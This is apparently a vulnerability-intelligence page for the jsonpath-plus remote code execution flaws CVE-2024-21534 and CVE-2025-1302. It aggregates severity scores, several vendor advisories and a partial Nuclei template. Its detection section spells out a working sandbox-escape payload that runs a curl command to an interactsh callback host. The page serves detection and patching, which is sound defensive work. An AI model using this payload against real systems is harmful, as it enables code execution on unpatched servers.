CVE-2024-21534
published 2024-10-11CVE-2024-21534: All versions of the package jsonpath-plus are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary…
PriorityP274critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
9.08%
94.7th percentile
All versions of the package jsonpath-plus are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node. **Note:** There were several attempts to fix it in versions [10.0.0-10.1.0](https://github.com/JSONPath-Plus/JSONPath/compare/v9.0.0...v10.1.0) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226).
Detection & IOCsextracted from sources · hover to see the quote
command$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl {{interactsh-url}}').toString())";Ethan=''[['constructor']][['constructor']](p);Ethan())]↗
- →Exploit payload targets POST endpoints accepting JSON body with a 'path' key containing a JSONPath expression that abuses constructor chaining to escape eval='safe' mode and execute arbitrary code via child_process.execSync ↗
- →Detection via out-of-band DNS callback: successful exploitation triggers a DNS lookup to an interactsh/canary URL embedded in the payload via curl ↗
- →HTTP response body containing '"result":' on targeted endpoints indicates the JSONPath query was processed, confirming a vulnerable jsonpath-plus instance ↗
- →Exploit leverages constructor chain pattern ''[['constructor']][['constructor']](p) to break out of the safe eval sandbox — monitor for this string pattern in incoming JSON POST bodies ↗
- →Vulnerability is triggered by unsafe default usage of eval='safe' mode in jsonpath-plus; this is an incomplete fix for CVE-2024-21534 which originally abused the vm module in Node.js ↗
- →Original CVE-2024-21534 vector used Node.js vm module abuse; multiple bypass payloads exist even after partial fixes in versions 10.0.0–10.1.0 — treat all jsonpath-plus < 10.3.0 as exploitable ↗
- ·The vulnerability requires jsonpath-plus to be used with its unsafe default eval='safe' mode; applications that explicitly disable eval or do not pass user-controlled input to JSONPath queries are not exploitable ↗
- ·Red Hat downgraded impact to low because no code paths in their affected products allow exploitation, and in OpenShift AI the direct dependency's feature requiring jsonpath-plus is never loaded ↗
- ·CVE-2024-21534 originally abused the Node.js vm module; partial fixes in 10.0.0–10.1.0 were bypassed, meaning detection rules targeting only the original vm-based payload pattern will miss newer constructor-chain variants ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ghsa9.8CRITICAL
osv9.8CRITICAL
vulncheck9.8CRITICAL
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
jsonpath-plus: Remote Code Execution in jsonpath-plus via Improper Input Sanitization
vendor_redhat·2025-02-15·CVSS 9.8
CVE-2025-1302 [CRITICAL] CWE-94 jsonpath-plus: Remote Code Execution in jsonpath-plus via Improper Input Sanitization
jsonpath-plus: Remote Code Execution in jsonpath-plus via Improper Input Sanitization
Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode.
**Note:**
This is caused by an incomplete fix for [CVE-2024-21534](https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-7945884).
A flaw was found in jsonpath-plus. This vulnerability allows remote code execution (RCE) via improper input sanitization, exploiting the unsafe default usage of eval='safe' mode.
Statement: Red Hat's initial impact rating of critical has been downgraded to low. While the vulnerable code is technically still present within Red Hat pro
Red Hat
jsonpath-plus: Remote Code Execution in jsonpath-plus via Improper Input Sanitization
vendor_redhat·2024-10-11·CVSS 9.8
CVE-2024-21534 [CRITICAL] CWE-94 jsonpath-plus: Remote Code Execution in jsonpath-plus via Improper Input Sanitization
jsonpath-plus: Remote Code Execution in jsonpath-plus via Improper Input Sanitization
All versions of the package jsonpath-plus are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node.
**Note:**
There were several attempts to fix it in versions [10.0.0-10.1.0](https://github.com/JSONPath-Plus/JSONPath/compare/v9.0.0...v10.1.0) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226).
A flaw was found in jsonpath-plus. This vulnerability allows remote code execution via improper input sanitisation and unsafe default usage of the vm module in Node.js. Attackers can exploit this by executing arbitrary cod
OSV
JSONPath Plus allows Remote Code Execution
osv·2025-02-15·CVSS 9.8
CVE-2025-1302 [CRITICAL] JSONPath Plus allows Remote Code Execution
JSONPath Plus allows Remote Code Execution
Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode.
**Note:**
This is caused by an incomplete fix for CVE-2024-21534.
GHSA
JSONPath Plus allows Remote Code Execution
ghsa·2025-02-15·CVSS 9.8
CVE-2025-1302 [CRITICAL] CWE-94 JSONPath Plus allows Remote Code Execution
JSONPath Plus allows Remote Code Execution
Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode.
**Note:**
This is caused by an incomplete fix for CVE-2024-21534.
VulnCheck
Improper Control of Generation of Code ('Code Injection')
vulncheck·2025·CVSS 9.8
CVE-2025-1302 [CRITICAL] Improper Control of Generation of Code ('Code Injection')
Improper Control of Generation of Code ('Code Injection')
Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. **Note:** This is caused by an incomplete fix for [CVE-2024-21534](https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-7945884).
Affected: JSONPath-plus JSONPath-plus
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-11-19&host_type=src&vulnerability=cve-2025-1302; https://das
OSV
JSONPath Plus Remote Code Execution (RCE) Vulnerability
osv·2024-10-11
CVE-2024-21534 [CRITICAL] JSONPath Plus Remote Code Execution (RCE) Vulnerability
JSONPath Plus Remote Code Execution (RCE) Vulnerability
Versions of the package jsonpath-plus before 10.0.7 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node.
**Note:**
There were several attempts to fix it in versions [10.0.0-10.1.0](https://github.com/JSONPath-Plus/JSONPath/compare/v9.0.0...v10.1.0) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226)
GHSA
JSONPath Plus Remote Code Execution (RCE) Vulnerability
ghsa·2024-10-11
CVE-2024-21534 [CRITICAL] CWE-94 JSONPath Plus Remote Code Execution (RCE) Vulnerability
JSONPath Plus Remote Code Execution (RCE) Vulnerability
Versions of the package jsonpath-plus before 10.0.7 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node.
**Note:**
There were several attempts to fix it in versions [10.0.0-10.1.0](https://github.com/JSONPath-Plus/JSONPath/compare/v9.0.0...v10.1.0) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226)
No detection rules found.
Nuclei
JSONPath Plus < 10.3.0 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2025-1302 [CRITICAL] JSONPath Plus < 10.3.0 - Remote Code Execution
JSONPath Plus < 10.3.0 - Remote Code Execution
Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. **Note:** This is caused by an incomplete fix for [CVE-2024-21534]
Template:
id: CVE-2025-1302
info:
name: JSONPath Plus < 10.3.0 - Remote Code Execution
author: Jaenact
severity: critical
description: |
Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. **Note:** This is caused by an incomplete fix for
No writeups or analysis indexed.
2024-10-11
Published